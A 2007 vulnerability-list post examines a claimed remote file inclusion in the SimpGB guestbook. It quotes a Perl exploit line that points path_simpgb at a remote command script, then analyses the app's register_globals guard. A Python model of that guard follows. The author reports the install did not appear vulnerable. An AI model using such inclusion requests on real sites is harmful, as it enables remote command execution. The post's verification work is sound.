[VIM] probably true: SimpGB RFI, likely dynamic variable evaluation

str0ke str0ke at milw0rm.com
Thu May 24 19:03:57 UTC 2007


exploit code
#######################
$req = HTTP::Request->new(GET
=>$Path.'guestbook.php?path_simpgb='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or
die "\nCould Not connect\n";
#######################

By default the config.php script doesn't initialize the no_rgcheck
variable; it just has it commented out. Pretty easy to bypass this if
register globals = on.
#########################
if(!$no_rgcheck)
{
	$rg_ini=@ini_get('register_globals');
	if($rg_ini || (strtolower($rg_ini)=='on'))
		die("register_globals should be set to off for security reasons");
}

# This shouldn't overwrite path_ or url_ variables correct?
while( list($var, $param) = @each($_GET) )
{
	if(!isset($$var))
	{
		if((substr($var,0,4)!="url_") && (substr($var,0,5)!="path_"))
		{
			$$var=$_GET[$var];
			if(!get_magic_quotes_gpc())
				$$var=addslashes($$var);
		}
	}
}

After installing the app it doesn't seem vulnerable, with or without
the rg check.

/str0ke
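
The two checks quoted in this post can be modelled to see when a request-supplied path_simpgb actually reaches script scope; the Python model below is an added example, not part of the original post or of SimpGB. It assumes register_globals copies GET parameters into globals before any script code runs, and app_assigned is a hypothetical stand-in for assignments the application makes itself, which the post does not show.

```python
GUARDED_PREFIXES = ("url_", "path_")


class ScriptDied(Exception):
    """Stands in for the die() in the register_globals check."""


def php_truthy(value):
    # PHP treats a missing variable, "" and "0" as false in if(!$var).
    return value not in (None, "", "0")


def scope_after_prologue(get_params, register_globals, app_assigned=None):
    """Return the variables in scope after the rg check and the import loop."""
    scope = {}
    if register_globals:
        # Assumption: the engine copies request parameters into globals first.
        scope.update(get_params)
    # Hypothetical: values the application assigns itself overwrite injected ones.
    scope.update(app_assigned or {})

    # if(!$no_rgcheck) { die if register_globals is on }
    if not php_truthy(scope.get("no_rgcheck")) and register_globals:
        raise ScriptDied("register_globals should be set to off for security reasons")

    # Import loop: only names not yet set and not starting with url_ / path_.
    # addslashes() is left out; it changes values, not which names get set.
    for name, value in get_params.items():
        if name not in scope and not name.startswith(GUARDED_PREFIXES):
            scope[name] = value
    return scope


def attacker_controls(name, get_params, register_globals, app_assigned=None):
    """True if the request's value for name is what the script ends up seeing."""
    try:
        scope = scope_after_prologue(get_params, register_globals, app_assigned)
    except ScriptDied:
        return False
    return name in get_params and scope.get(name) == get_params[name]


# Constructed request parameters, not values taken from the post.
REQUEST = {"path_simpgb": "constructed-value", "no_rgcheck": "1"}

if __name__ == "__main__":
    for rg in (False, True):
        for params in ({"path_simpgb": "constructed-value"}, REQUEST):
            print(rg, sorted(params), attacker_controls("path_simpgb", params, rg))
```

In this model the request value survives only when register_globals is on and no_rgcheck arrives with the request; assigning the variable in application code before use removes it.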

